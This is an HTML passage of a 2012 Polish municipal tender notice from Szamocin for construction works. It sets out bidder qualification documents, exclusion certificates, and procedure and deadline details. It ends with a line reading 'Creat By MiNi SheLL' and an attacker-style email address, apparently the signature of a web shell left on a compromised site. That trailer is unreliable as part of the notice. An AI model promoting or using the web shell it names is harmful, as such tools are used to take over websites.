<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć wykaz osób zgodnie z załącznikiem nr 5 do SIWZ Potencjał kadrowy i załączyć kserokopie uprawnień oraz zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa lub innej izby samorządu zawodowego oraz informacje o podstawie dysponowania tymi osobami. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeśli posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
     Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie  dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaszamocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Szamocin Plac Wolności 19, 64-820 Szamocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 09:30, miejsce: Urząd Miasta i Gminy Szamocin Plac Wolności 19, 64-820 Szamocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com